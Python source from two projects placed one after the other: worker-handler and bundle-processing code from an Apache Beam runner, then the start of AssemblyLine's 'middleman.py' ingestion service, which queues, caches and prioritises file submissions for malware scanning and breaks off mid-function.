def data_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url='localhost:%s' % self.data_port)
def state_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url='localhost:%s' % self.state_port)
def logging_api_service_descriptor(self):
return endpoints_pb2.ApiServiceDescriptor(
url='localhost:%s' % self.logging_port)
def close(self):
self.control_handler.done()
self.data_plane_handler.close()
to_wait = [
self.control_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.data_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.state_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS),
self.logging_server.stop(self._DEFAULT_SHUTDOWN_TIMEOUT_SECS)
]
for w in to_wait:
w.wait()
super(GrpcWorkerHandler, self).close()
@WorkerHandler.register_environment(
common_urns.environments.EXTERNAL.urn, beam_runner_api_pb2.ExternalPayload)
class ExternalWorkerHandler(GrpcWorkerHandler):
def __init__(self, external_payload, state, provision_info):
super(ExternalWorkerHandler, self).__init__(state, provision_info)
self._external_payload = external_payload
def start_worker(self):
stub = beam_fn_api_pb2_grpc.BeamFnExternalWorkerPoolStub(
GRPCChannelFactory.insecure_channel(
self._external_payload.endpoint.url))
response = stub.NotifyRunnerAvailable(
beam_fn_api_pb2.NotifyRunnerAvailableRequest(
worker_id='worker_%s' % uuid.uuid4(),
control_endpoint=endpoints_pb2.ApiServiceDescriptor(
url=self.control_address),
logging_endpoint=self.logging_api_service_descriptor(),
params=self._external_payload.params))
if response.error:
raise RuntimeError("Error starting worker: %s" % response.error)
def stop_worker(self):
pass
@WorkerHandler.register_environment(python_urns.EMBEDDED_PYTHON_GRPC, bytes)
class EmbeddedGrpcWorkerHandler(GrpcWorkerHandler):
def __init__(self, num_workers_payload, state, provision_info):
super(EmbeddedGrpcWorkerHandler, self).__init__(state, provision_info)
self._num_threads = int(num_workers_payload) if num_workers_payload else 1
def start_worker(self):
self.worker = sdk_worker.SdkHarness(
self.control_address, worker_count=self._num_threads)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.daemon = True
self.worker_thread.start()
def stop_worker(self):
self.worker_thread.join()
@WorkerHandler.register_environment(python_urns.SUBPROCESS_SDK, bytes)
class SubprocessSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self, worker_command_line, state, provision_info):
super(SubprocessSdkWorkerHandler, self).__init__(state, provision_info)
self._worker_command_line = worker_command_line
def start_worker(self):
from apache_beam.runners.portability import local_job_service
self.worker = local_job_service.SubprocessSdkWorker(
self._worker_command_line, self.control_address)
self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.start()
def stop_worker(self):
self.worker_thread.join()
@WorkerHandler.register_environment(common_urns.environments.DOCKER.urn,
beam_runner_api_pb2.DockerPayload)
class DockerSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self, payload, state, provision_info):
super(DockerSdkWorkerHandler, self).__init__(state, provision_info)
self._container_image = payload.container_image
self._container_id = None
def start_worker(self):
try:
subprocess.check_call(['docker', 'pull', self._container_image])
except Exception:
logging.info('Unable to pull image %s', self._container_image)
self._container_id = subprocess.check_output(
['docker',
'run',
'-d',
# TODO: credentials
'--network=host',
self._container_image,
'--id=%s' % uuid.uuid4(),
'--logging_endpoint=%s' % self.logging_api_service_descriptor().url,
'--control_endpoint=%s' % self.control_address,
'--artifact_endpoint=%s' % self.control_address,
'--provision_endpoint=%s' % self.control_address,
]).strip()
while True:
logging.info('Waiting for docker to start up...')
status = subprocess.check_output([
'docker',
'inspect',
'-f',
'{{.State.Status}}',
self._container_id]).strip()
if status == 'running':
break
elif status in ('dead', 'exited'):
subprocess.call([
'docker',
'container',
'logs',
self._container_id])
raise RuntimeError('SDK failed to start.')
time.sleep(1)
def stop_worker(self):
if self._container_id:
subprocess.call([
'docker',
'kill',
self._container_id])
class WorkerHandlerManager(object):
def __init__(self, environments, job_provision_info=None):
self._environments = environments
self._job_provision_info = job_provision_info
self._cached_handlers = {}
self._state = FnApiRunner.StateServicer() # rename?
def get_worker_handler(self, environment_id):
if environment_id is None:
# Any environment will do, pick one arbitrarily.
environment_id = next(iter(self._environments.keys()))
environment = self._environments[environment_id]
worker_handler = self._cached_handlers.get(environment_id)
if worker_handler is None:
worker_handler = self._cached_handlers[
environment_id] = WorkerHandler.create(
environment, self._state, self._job_provision_info)
worker_handler.start_worker()
return worker_handler
def close_all(self):
for controller in set(self._cached_handlers.values()):
try:
controller.close()
except Exception:
logging.info("Error closing controller %s" % controller, exc_info=True)
self._cached_handlers = {}
class ExtendedProvisionInfo(object):
def __init__(self, provision_info=None, artifact_staging_dir=None):
self.provision_info = (
provision_info or beam_provision_api_pb2.ProvisionInfo())
self.artifact_staging_dir = artifact_staging_dir
_split_managers = []
@contextlib.contextmanager
def split_manager(stage_name, split_manager):
"""Registers a split manager to control the flow of elements to a given stage.
Used for testing.
A split manager should be a coroutine yielding desired split fractions,
receiving the corresponding split results. Currently, only one input is
supported.
"""
try:
_split_managers.append((stage_name, split_manager))
yield
finally:
_split_managers.pop()
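# A minimal example of a split manager, following the protocol described
# in the docstring above (the stage name 'MyStage' is hypothetical):
#
#   def halve(num_elements):
#       # Ask for one 50/50 split, then let the bundle run to completion.
#       split_result = yield 0.5
#
#   with split_manager('MyStage', halve):
#       result = pipeline.run()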
class BundleManager(object):
_uid_counter = 0
def __init__(
self, controller, get_buffer, get_input_coder_impl, bundle_descriptor,
progress_frequency=None, skip_registration=False):
self._controller = controller
self._get_buffer = get_buffer
self._get_input_coder_impl = get_input_coder_impl
self._bundle_descriptor = bundle_descriptor
self._registered = skip_registration
self._progress_frequency = progress_frequency
def process_bundle(self, inputs, expected_outputs):
# Unique id for the instruction processing this bundle.
BundleManager._uid_counter += 1
process_bundle_id = 'bundle_%s' % BundleManager._uid_counter
# Register the bundle descriptor, if needed.
if self._registered:
registration_future = None
else:
process_bundle_registration = beam_fn_api_pb2.InstructionRequest(
register=beam_fn_api_pb2.RegisterRequest(
process_bundle_descriptor=[self._bundle_descriptor]))
registration_future = self._controller.control_handler.push(
process_bundle_registration)
self._registered = True
unique_names = set(
t.unique_name for t in self._bundle_descriptor.transforms.values())
for stage_name, candidate in reversed(_split_managers):
if (stage_name in unique_names
or (stage_name + '/Process') in unique_names):
split_manager = candidate
break
else:
split_manager = None
if not split_manager:
# Write all the input data to the channel immediately.
for (transform_id, name), elements in inputs.items():
data_out = self._controller.data_plane_handler.output_stream(
process_bundle_id, beam_fn_api_pb2.Target(
primitive_transform_reference=transform_id, name=name))
for element_data in elements:
data_out.write(element_data)
data_out.close()
split_results = []
# Actually start the bundle.
if registration_future and registration_future.get().error:
raise RuntimeError(registration_future.get().error)
process_bundle = beam_fn_api_pb2.InstructionRequest(
instruction_id=process_bundle_id,
process_bundle=beam_fn_api_pb2.ProcessBundleRequest(
process_bundle_descriptor_reference=self._bundle_descriptor.id))
result_future = self._controller.control_handler.push(process_bundle)
with ProgressRequester(
self._controller, process_bundle_id, self._progress_frequency):
if split_manager:
(read_transform_id, name), buffer_data = only_element(inputs.items())
num_elements = len(list(
self._get_input_coder_impl(read_transform_id).decode_all(
b''.join(buffer_data))))
# Start the split manager in case it wants to set any breakpoints.
split_manager_generator = split_manager(num_elements)
try:
split_fraction = next(split_manager_generator)
done = False
except StopIteration:
done = True
# Send all the data.
data_out = self._controller.data_plane_handler.output_stream(
process_bundle_id,
beam_fn_api_pb2.Target(
primitive_transform_reference=read_transform_id, name=name))
data_out.write(b''.join(buffer_data))
data_out.close()
# Execute the requested splits.
while not done:
if split_fraction is None:
split_result = None
else:
split_request = beam_fn_api_pb2.InstructionRequest(
process_bundle_split=
beam_fn_api_pb2.ProcessBundleSplitRequest(
instruction_reference=process_bundle_id,
desired_splits={
read_transform_id:
beam_fn_api_pb2.ProcessBundleSplitRequest.DesiredSplit(
fraction_of_remainder=split_fraction,
estimated_input_elements=num_elements)
}))
split_response = self._controller.control_handler.push(
split_request).get()
for t in (0.05, 0.1, 0.2):
waiting = ('Instruction not running', 'not yet scheduled')
if any(msg in split_response.error for msg in waiting):
time.sleep(t)
split_response = self._controller.control_handler.push(
split_request).get()
if 'Unknown process bundle' in split_response.error:
# It may have finished too fast.
split_result = None
elif split_response.error:
raise RuntimeError(split_response.error)
else:
split_result = split_response.process_bundle_split
split_results.append(split_result)
try:
split_fraction = split_manager_generator.send(split_result)
except StopIteration:
break
# Gather all output data.
expected_targets = [
beam_fn_api_pb2.Target(primitive_transform_reference=transform_id,
name=output_name)
for (transform_id, output_name), _ in expected_outputs.items()]
logging.debug('Gather all output data from %s.', expected_targets)
for output in self._controller.data_plane_handler.input_elements(
process_bundle_id,
expected_targets,
abort_callback=lambda: (result_future.is_done()
and result_future.get().error)):
target_tuple = (
output.target.primitive_transform_reference, output.target.name)
if target_tuple in expected_outputs:
self._get_buffer(expected_outputs[target_tuple]).append(output.data)
logging.debug('Wait for the bundle to finish.')
result = result_future.get()
if result.error:
raise RuntimeError(result.error)
return result, split_results
class ProgressRequester(threading.Thread):
def __init__(self, controller, instruction_id, frequency, callback=None):
super(ProgressRequester, self).__init__()
self._controller = controller
self._instruction_id = instruction_id
self._frequency = frequency
self._done = False
self._latest_progress = None
self._callback = callback
self.daemon = True
def __enter__(self):
if self._frequency:
self.start()
def __exit__(self, *unused_exc_info):
if self._frequency:
self.stop()
def run(self):
while not self._done:
try:
progress_result = self._controller.control_handler.push(
beam_fn_api_pb2.InstructionRequest(
process_bundle_progress=
beam_fn_api_pb2.ProcessBundleProgressRequest(
instruction_reference=self._instruction_id))).get()
self._latest_progress = progress_result.process_bundle_progress
if self._callback:
self._callback(self._latest_progress)
except Exception as exn:
logging.error("Bad progress: %s", exn)
time.sleep(self._frequency)
def stop(self):
self._done = True
class ControlFuture(object):
def __init__(self, instruction_id, response=None):
self.instruction_id = instruction_id
if response:
self._response = response
else:
self._response = None
self._condition = threading.Condition()
def is_done(self):
return self._response is not None
def set(self, response):
with self._condition:
self._response = response
self._condition.notify_all()
def get(self, timeout=None):
if not self._response:
with self._condition:
if not self._response:
self._condition.wait(timeout)
return self._response
class FnApiMetrics(metrics.metric.MetricResults):
def __init__(self, step_monitoring_infos, user_metrics_only=True):
"""Used for querying metrics from the PipelineResult object.
step_monitoring_infos: Per step metrics specified as MonitoringInfos.
user_metrics_only: If true, restrict the results to user metrics
derived from the step_monitoring_infos.
"""
self._counters = {}
self._distributions = {}
self._gauges = {}
self._user_metrics_only = user_metrics_only
self._init_metrics_from_monitoring_infos(step_monitoring_infos)
self._monitoring_infos = step_monitoring_infos
def _init_metrics_from_monitoring_infos(self, step_monitoring_infos):
for smi in step_monitoring_infos.values():
# Only include user metrics.
for mi in smi:
if (self._user_metrics_only and
not monitoring_infos.is_user_monitoring_info(mi)):
continue
key = self._to_metric_key(mi)
if monitoring_infos.is_counter(mi):
self._counters[key] = (
monitoring_infos.extract_metric_result_map_value(mi))
elif monitoring_infos.is_distribution(mi):
self._distributions[key] = (
monitoring_infos.extract_metric_result_map_value(mi))
elif monitoring_infos.is_gauge(mi):
self._gauges[key] = (
monitoring_infos.extract_metric_result_map_value(mi))
def _to_metric_key(self, monitoring_info):
# Right now this assumes that all metrics have a PTRANSFORM
ptransform_id = monitoring_info.labels['PTRANSFORM']
namespace, name = monitoring_infos.parse_namespace_and_name(monitoring_info)
return MetricKey(ptransform_id, MetricName(namespace, name))
def query(self, filter=None):
counters = [metrics.execution.MetricResult(k, v, v)
for k, v in self._counters.items()
if self.matches(filter, k)]
distributions = [metrics.execution.MetricResult(k, v, v)
for k, v in self._distributions.items()
if self.matches(filter, k)]
gauges = [metrics.execution.MetricResult(k, v, v)
for k, v in self._gauges.items()
if self.matches(filter, k)]
return {self.COUNTERS: counters,
self.DISTRIBUTIONS: distributions,
self.GAUGES: gauges}
def monitoring_infos(self):
return [item for sublist in self._monitoring_infos.values() for item in
sublist]
class RunnerResult(runner.PipelineResult):
def __init__(self, state, monitoring_infos_by_stage, metrics_by_stage):
super(RunnerResult, self).__init__(state)
self._monitoring_infos_by_stage = monitoring_infos_by_stage
self._metrics_by_stage = metrics_by_stage
self._metrics = None
self._monitoring_metrics = None
def wait_until_finish(self, duration=None):
return self._state
def metrics(self):
"""Returns a queryable oject including user metrics only."""
if self._metrics is None:
self._metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=True)
return self._metrics
def monitoring_metrics(self):
"""Returns a queryable object including all metrics."""
if self._monitoring_metrics is None:
self._monitoring_metrics = FnApiMetrics(
self._monitoring_infos_by_stage, user_metrics_only=False)
return self._monitoring_metrics
middleman.py
#!/usr/bin/env python
"""
Middleman
Middleman is responsible for monitoring for incoming submission requests,
sending submissions, waiting for submissions to complete, sending a message
to a notification queue as specified by the submission and, based on the
score received, possibly sending a message to indicate that an alert should
be created.
"""
# This file has comments prefixed with a 'df' which are used to extract a
# dataflow diagram. These comments take one of the six forms shown below:
#
# rule <name> <regex> => <replacement> [#]
# text <literal text> [#]
# line <name> [#]
# node <name> [#]
# pull <name> [#]
# push <name> [#]
#
# Rule lines cause the replacement to be stored with a given name.
# Text lines insert the text verbatim. Line lines apply the rule with
# the given name to the current line. Node and pull/push lines are
# similar except that the text extracted from a node line is retained
# and matched with all following pull/push lines until the next node
# line. All dataflow directives are terminated by a newline but they
# can also be terminated by a hash character so that they can share a
# line with pylint, or other, directives.
#
# To produce a dataflow diagram find the dataflow script (most likely
# under al/run/admin) and (with Graphviz installed) run:
#
# dataflow.py < middleman.py | dot -Tsvg > dataflow.svg
#
# df rule add ^\W*(\w+)\.add.* => \1
# df rule calls ^\W*(?:if )?(\w+).* => \1
# df rule def ^def (\w+).* => \1
# df rule delete ^\W*(\w+)\.delete.* => \1
# df rule hash ^(\w+) = .* => \1 [label=\1,shape=polygon,sides=4,skew=.4]
# df rule ifcalls ^\W*if (\w+).* => \1
# df rule pop ^.* (\w+)\.pop.* => \1
# df rule push ^\W*(\w+)\.push.* => \1
# df rule queue ^(\w+) = .* => \1 [label=\1,shape=plaintext]
# df rule thread ^.*range.(\w+).*target=(\w+).* => \2 [label="\2 x\1"]
#
# df text digraph dataflow {
# df text node [shape=box]
# df text rankdir=TB
# df text ranksep="1"
# df text { rank=source; "ingestq"; "completeq"; }
# df text { rank=sink; "alertq"; "trafficq"; }
import getopt
import logging
import redis
import signal
import sys
import time
import riak
from collections import namedtuple
from math import tanh
from random import random
from assemblyline.common import net
from threading import RLock, Thread
from assemblyline.common.charset import dotdump, safe_str
from assemblyline.common.exceptions import get_stacktrace_info
from assemblyline.common.isotime import iso_to_epoch, now, now_as_iso
from assemblyline.common.net import get_hostip, get_hostname, get_mac_address
from assemblyline.al.common import forge
from assemblyline.al.common import counter
from assemblyline.al.common import log
from assemblyline.al.common import message
from assemblyline.al.common import queue
from assemblyline.al.common.notice import Notice, overrides
from assemblyline.al.common.remote_datatypes import Hash
from assemblyline.al.common.task import Task, get_submission_overrides
from assemblyline.al.core.datastore import create_filescore_key
from assemblyline.al.core.filestore import FileStoreException, CorruptedFileStoreException
class ScanLock(object):
SCAN_LOCK_LOCK = RLock()
SCAN_LOCK = {}
def __init__(self, scan_key):
self.scan_key = scan_key
def __enter__(self):
with self.SCAN_LOCK_LOCK:
l = self.SCAN_LOCK.get(self.scan_key, None)
if not l:
self.SCAN_LOCK[self.scan_key] = l = [0, RLock()]
l[0] += 1
l[1].acquire()
def __exit__(self, unused1, unused2, unused3):
with self.SCAN_LOCK_LOCK:
l = self.SCAN_LOCK[self.scan_key]
l[0] -= 1
if l[0] == 0:
del self.SCAN_LOCK[self.scan_key]
l[1].release()
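# Usage sketch: ScanLock serializes all work on a single scan_key across
# threads (see completed() below) while leaving other keys unblocked; the
# reference count ensures the per-key lock is discarded once idle:
#
#   with ScanLock(scan_key):
#       raw = scanning.pop(scan_key)
#       ...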
Timeout = namedtuple('Timeout', ['time', 'scan_key'])
Classification = forge.get_classification()
config = forge.get_config()
constants = forge.get_constants()
log.init_logging("middleman")
logger = logging.getLogger('assemblyline.middleman')
persistent = {
'db': config.core.redis.persistent.db,
'host': config.core.redis.persistent.host,
'port': config.core.redis.persistent.port,
}
shards = 1
try:
shards = int(config.core.middleman.shards)
except AttributeError:
logger.warning("No shards setting. Defaulting to %d.", shards)
shard = '0'
opts, _ = getopt.getopt(sys.argv[1:], 's:', ['shard='])
for opt, arg in opts:
if opt in ('-s', '--shard'):
shard = arg
# Globals
alertq = queue.NamedQueue('m-alert', **persistent) # df line queue
cache = {}
cache_lock = RLock()
chunk_size = 1000
completeq_name = 'm-complete-' + shard
date_fmt = '%Y-%m-%dT%H:%M:%SZ'
default_prefix = config.core.middleman.default_prefix
dup_prefix = 'w-' + shard + '-'
dupq = queue.MultiQueue(**persistent) # df line queue
expire_after_seconds = config.core.middleman.expire_after
get_whitelist_verdict = forge.get_get_whitelist_verdict()
hostinfo = {
'ip': get_hostip(),
'mac_address': get_mac_address(),
'host': get_hostname(),
}
ingestq_name = 'm-ingest-' + shard
is_low_priority = forge.get_is_low_priority()
max_priority = config.submissions.max.priority
max_retries = 10
max_time = 2 * 24 * 60 * 60 # Wait 2 days for responses.
max_waiting = int(config.core.dispatcher.max.inflight) / (2 * shards)
min_priority = 1
priority_value = constants.PRIORITIES
retry_delay = 180
retryq = queue.NamedQueue('m-retry-' + shard, **persistent) # df line queue
running = True
sampling = False
selected_initial = [
'Antivirus', 'Extraction', 'Filtering', 'Networking', 'Static Analysis'
]
stale_after_seconds = config.core.middleman.stale_after
start_time = now()
submissionq = queue.NamedQueue('m-submission-' + shard, **persistent) # df line queue
timeouts = []
timeouts_lock = RLock()
whitelist = forge.get_whitelist()
whitelisted = {}
whitelisted_lock = RLock()
dropper_threads = 1
try:
dropper_threads = int(config.core.middleman.dropper_threads)
except AttributeError:
logger.warning(
"No dropper_threads setting. Defaulting to %d.",
dropper_threads
)
incomplete_expire_after_seconds = 3600
try:
incomplete_expire_after_seconds = \
config.core.middleman.incomplete_expire_after
except AttributeError:
logger.warning(
"No incomplete_stale_after setting. Defaulting to %d.",
incomplete_expire_after_seconds
)
incomplete_stale_after_seconds = 1800
try:
incomplete_stale_after_seconds = \
config.core.middleman.incomplete_stale_after
except AttributeError:
logger.warning(
"No incomplete_stale_after setting. Defaulting to %d.",
incomplete_stale_after_seconds
)
ingester_threads = 1
try:
ingester_threads = int(config.core.middleman.ingester_threads)
except AttributeError:
logger.warning(
"No ingester_threads setting. Defaulting to %d.",
ingester_threads
)
submitter_threads = 1
try:
submitter_threads = int(config.core.middleman.submitter_threads)
except AttributeError:
logger.warning(
"No submitter_threads setting. Defaulting to %d.",
submitter_threads
)
defaults = {
'classification': config.core.middleman.classification,
'completed_queue': completeq_name,
'deep_scan': False,
'ignore_cache': False,
'ignore_filtering': False,
'ignore_tag': False,
'max_extracted': config.core.middleman.max_extracted,
'max_supplementary': config.core.middleman.max_supplementary,
'params': {},
}
# When a unique queue for a priority group has passed a threshold value, we
# start sampling, gradually increasing the probability that a newly ingested
# entry will be dropped.
sample_threshold = {
'low': config.core.middleman.get('sampling_at', {}).get('low', 10000000),
'medium': config.core.middleman.get('sampling_at', {}).get('medium', 2000000),
'high': config.core.middleman.get('sampling_at', {}).get('high', 1000000),
'critical': config.core.middleman.get('sampling_at', {}).get('critical', 500000),
}
priority_range = {}
prev = 'low'
start = 0
for lvl in ('medium', 'high', 'critical', 'user'):
end = priority_value.get(lvl, max_priority + 1)
priority_range[prev] = (start, end - 1)
prev = lvl
start = end
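# For illustration only (the real values come from constants.PRIORITIES):
# if PRIORITIES were {'medium': 100, 'high': 200, 'critical': 300} with
# no 'user' entry and max_priority 1000, the loop above would yield
# priority_range == {'low': (0, 99), 'medium': (100, 199),
# 'high': (200, 299), 'critical': (300, 1000)}.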
threshold_value = {
'critical': 500,
'high': 100,
}
# Input. An external process creates a record when any submission completes.
completeq = queue.NamedQueue(completeq_name) # df line queue
# Output. Dropped entries are placed on this queue.
dropq = queue.NamedQueue('m-drop-' + shard, **persistent) # df line queue
# Input. An external process places submission requests on this queue.
ingestq = queue.NamedQueue(ingestq_name, **persistent) # df line queue
# Output. Notifications are placed on a notification queue.
notificationq = {}
# Input/Output. Unique requests are placed in and processed from this queue.
uniqueq = queue.PriorityQueue('m-unique-' + shard, **persistent) # df line queue
# State. The submissions in progress are stored in Redis in order to
# persist this state and recover in case we crash.
scanning = Hash('m-scanning-' + shard, **persistent) # df line hash
# Status.
statusq = queue.CommsQueue('status')
# Traffic.
# df text trafficq [label=trafficq,shape=plaintext]
trafficq = queue.LocalQueue()
def exit_and_log(original):
# noinspection PyBroadException
def wrapper(*args, **kwargs):
global running # pylint: disable=W0603
try:
return original(*args, **kwargs)
except: # pylint: disable=W0702
logger.exception("Exiting:")
running = False
wrapper.__name__ = original.__name__
wrapper.__doc__ = original.__doc__
wrapper.__dict__.update(original.__dict__)
return wrapper
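# (The three wrapper.__*__ assignments above replicate what
# functools.wraps(original) would provide; the decorator's real job is to
# flag the whole process for shutdown if any worker thread dies.)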
def _add(key, psid, sid, score, errors, t):
cache[key] = {
'errors': errors,
'psid': psid,
'score': score,
'sid': sid,
'time': t,
}
def add(key, psid, sid, score, errors, t):
with cache_lock:
_add(key, psid, sid, score, errors, t)
def check(datastore, notice):
key = stamp_filescore_key(notice)
with cache_lock:
result = cache.get(key, None)
counter_name = 'ingest.cache_hit_local'
if result:
logger.info('Local cache hit')
else:
counter_name = 'ingest.cache_hit'
result = datastore.get_filescore(key)
if result:
logger.info('Remote cache hit')
else:
ingester_counts.increment('ingest.cache_miss')
return None, False, None, key
add(key, result.get('psid', None), result['sid'], result['score'],
result.get('errors', 0), result['time'])
current_time = now()
delta = current_time - result.get('time', current_time)
errors = result.get('errors', 0)
if expired(delta, errors):
ingester_counts.increment('ingest.cache_expired')
with cache_lock:
cache.pop(key, None)
datastore.delete_filescore(key)
return None, False, None, key
elif stale(delta, errors):
ingester_counts.increment('ingest.cache_stale')
return None, False, result['score'], key
ingester_counts.increment(counter_name)
return result.get('psid', None), result['sid'], result['score'], key
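# (check() returns a (psid, previous_sid, score, scan_key) tuple: a miss
# or expired entry comes back as (None, False, None, key); a stale hit
# keeps the old score so ingest() can still use it to assign priority
# without treating the entry as a duplicate.)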
# Invoked when notified that a submission has completed.
# noinspection PyBroadException
def completed(task): # df node def
sha256 = task.root_sha256
psid = task.psid
score = task.score
sid = task.sid
scan_key = task.scan_key
with ScanLock(scan_key):
# Remove the entry from the hash of submissions in progress.
raw = scanning.pop(scan_key) # df pull pop
if not raw:
logger.warning("Untracked submission (score=%d) for: %s %s",
int(score), sha256, str(task.metadata))
# Not a result we care about. We are notified for every
# submission that completes. Some submissions will not be ours.
if task.metadata:
stype = None
try:
stype = task.metadata.get('type', None)
except: # pylint: disable=W0702
logger.exception("Malformed metadata: %s:", sid)
if not stype:
return scan_key
if (task.description or '').startswith(default_prefix):
raw = {
'metadata': task.metadata,
'overrides': get_submission_overrides(task, overrides),
'sha256': sha256,
'type': stype,
}
finalize(psid, sid, score, Notice(raw))
return scan_key
errors = task.raw.get('error_count', 0)
file_count = task.raw.get('file_count', 0)
ingester_counts.increment('ingest.submissions_completed')
ingester_counts.increment('ingest.files_completed', file_count)
ingester_counts.increment('ingest.bytes_completed', int(task.size or 0))
notice = Notice(raw)
with cache_lock:
_add(scan_key, psid, sid, score, errors, now())
finalize(psid, sid, score, notice) # df push calls
def exhaust():
while True:
res = dupq.pop( # df pull pop
dup_prefix + scan_key, blocking=False
)
if res is None:
break
yield res
# You may be tempted to remove the assignment to dups and use the
# value directly in the for loop below. That would be a mistake.
# The function finalize may push on the duplicate queue which we
# are pulling off and so condensing those two lines creates a
# potential infinite loop.
dups = [dup for dup in exhaust()]
for dup in dups:
finalize(psid, sid, score, Notice(dup))
return scan_key
def stamp_filescore_key(notice, sha256=None):
if not sha256:
sha256 = notice.get('sha256')
key_data = notice.parse(
description=': '.join((default_prefix, sha256 or '')), **defaults
)
selected = notice.get('selected')
key = notice.get('scan_key', None)
if not key:
key = create_filescore_key(sha256, key_data, selected)
notice.set('scan_key', key)
return key
def determine_resubmit_selected(selected, resubmit_to):
resubmit_selected = None
selected = set(selected)
resubmit_to = set(resubmit_to)
if not selected.issuperset(resubmit_to):
resubmit_selected = sorted(selected.union(resubmit_to))
return resubmit_selected
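# For example: determine_resubmit_selected(['Antivirus'],
# ['Dynamic Analysis']) returns ['Antivirus', 'Dynamic Analysis'], while a
# selected list that already covers resubmit_to yields None (no
# resubmission needed).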
def drop(notice): # df node def
priority = notice.get('priority')
dropped = False
if priority <= min_priority:
dropped = True
else:
for level in ('low', 'medium', 'critical', 'high'):
rng = priority_range[level]
if rng[0] <= priority <= rng[1]:
dropped = must_drop(uniqueq.count(*rng),
sample_threshold[level])
break
if notice.get('never_drop', False) or not dropped:
return False
notice.set('failure', 'Skipped')
dropq.push(notice.raw) # df push push
ingester_counts.increment('ingest.skipped')
return True
def drop_chance(length, maximum):
return tanh(float(length - maximum) / maximum * 2.0)
@exit_and_log
def dropper(): # df node def
datastore = forge.get_datastore()
while running:
raw = dropq.pop(timeout=1) # df pull pop
if not raw:
continue
notice = Notice(raw)
send_notification(notice)
c12n = notice.get('classification', config.core.middleman.classification)
expiry = now_as_iso(86400)
sha256 = notice.get('sha256')
datastore.save_or_freshen_file(sha256, {'sha256': sha256}, expiry, c12n)
datastore.close()
def expired(delta, errors):
if errors:
return delta >= incomplete_expire_after_seconds
else:
return delta >= expire_after_seconds
def finalize(psid, sid, score, notice): # df node def
logger.debug("Finalizing (score=%d) %s", score, notice.get('sha256'))
if psid:
notice.set('psid', psid)
notice.set('sid', sid)
notice.set('al_score', score)
selected = notice.get('selected', [])
resubmit_to = notice.get('resubmit_to', [])
resubmit_selected = determine_resubmit_selected(selected, resubmit_to)
will_resubmit = resubmit_selected and should_resubmit(score)
if will_resubmit:
notice.set('psid', None)
if is_alert(notice, score):
alertq.push(notice.raw) # df push push
send_notification(notice)
if will_resubmit:
notice.set('psid', sid)
notice.set('resubmit_to', [])
notice.set('scan_key', None)
notice.set('sid', None)
notice.set('selected', resubmit_selected)
priority = notice.get('priority', 0)
uniqueq.push(priority, notice.raw) # df push push
def ingest(datastore, user_groups, raw): # df node def
notice = Notice(raw)
ignore_size = notice.get('ignore_size', False)
never_drop = notice.get('never_drop', False)
sha256 = notice.get('sha256')
size = notice.get('size', 0)
# Make sure we have a submitter ...
user = notice.get('submitter', None)
if user is None:
user = config.submissions.user
notice.set('submitter', user)
# ... and groups.
groups = notice.get('groups', None)
if groups is None:
groups = user_groups.get(user, None)
if groups is None:
ruser = datastore.get_user(user)
if not ruser:
return
groups = ruser.get('groups', [])
user_groups[user] = groups
notice.set('groups', groups)
selected = notice.get('selected', None)
if not selected:
selected = selected_initial
notice.set('selected', selected)
notice.set('resubmit_to', ['Dynamic Analysis'])
resubmit_to = notice.get('resubmit_to', None)
if resubmit_to is None:
notice.set('resubmit_to', [])
ingester_counts.increment('ingest.bytes_ingested', int(size))
ingester_counts.increment('ingest.submissions_ingested')
if not sha256:
send_notification(
notice, failure="Invalid sha256", logfunc=logger.warning
)
return
c12n = notice.get('classification', '')
if not Classification.is_valid(c12n):
send_notification(
notice, failure="Invalid classification %s" % c12n,
logfunc=logger.warning
)
return
metadata = notice.get('metadata', {})
if isinstance(metadata, dict):
to_delete = []
for k, v in metadata.iteritems():
# Use a distinct name so the submission's size (checked below) isn't
# clobbered by the per-value size.
value_size = sys.getsizeof(v, -1)
if isinstance(v, basestring):
value_size = len(v)
if value_size > config.core.middleman.max_value_size:
to_delete.append(k)
elif value_size < 0:
to_delete.append(k)
if to_delete:
logger.info('Removing %s from %s', to_delete, notice.raw)
for k in to_delete:
metadata.pop(k, None)
if size > config.submissions.max.size and not ignore_size and not never_drop:
notice.set(
'failure', "File too large (%d > %d)" % (size, config.submissions.max.size)
)
dropq.push(notice.raw) # df push push
ingester_counts.increment('ingest.skipped')
return
pprevious, previous, score = None, False, None
if not notice.get('ignore_cache', False):
pprevious, previous, score, _ = check(datastore, notice)
# Assign priority.
low_priority = is_low_priority(notice)
priority = notice.get('priority')
if priority is None:
priority = priority_value['medium']
if score is not None:
priority = priority_value['low']
for level in ('critical', 'high'):
if score >= threshold_value[level]:
priority = priority_value[level]
break
elif low_priority:
priority = priority_value['low']
# Reduce the priority by an order of magnitude for very old files.
current_time = now()
if priority and \
expired(current_time - seconds(notice.get('ts', current_time)), 0):
priority = (priority / 10) or 1
notice.set('priority', priority)
# Do this after priority has been assigned.
# (So we don't end up dropping the resubmission).
if previous:
ingester_counts.increment('ingest.duplicates')
finalize(pprevious, previous, score, notice) # df push calls
return
if drop(notice): # df push calls
return
if is_whitelisted(notice): # df push calls
return
uniqueq.push(priority, notice.raw) # df push push
@exit_and_log
def ingester(): # df node def # pylint:disable=R0912
datastore = forge.get_datastore()
user_groups = {}
# Move from ingest to unique and waiting queues.
# While there are entries in the ingest queue we consume chunk_size
# entries at a time and move unique entries to uniqueq / queued and
# duplicates to their own queues / waiting.
while running:
while True:
result = completeq.pop(blocking=False) # df pull pop
if not result:
break
completed(Task(result)) # df push calls
entry = ingestq.pop(timeout=1) # df pull pop
if not entry:
continue
trafficq.push(entry) # df push push
sha256 = entry.get('sha256', '')
if not sha256 or len(sha256) != 64:
logger.error("Invalid sha256: %s", entry)
continue
entry['md5'] = entry.get('md5', '').lower()
entry['sha1'] = entry.get('sha1', '').lower()
entry['sha256'] = sha256.lower()
ingest(datastore, user_groups, entry) # df push calls
datastore.close()
# noinspection PyBroadException
def init():
datastore = forge.get_datastore()
datastore.commit_index('submission')
sids = [
x['submission.sid'] for x in datastore.stream_search(
'submission',
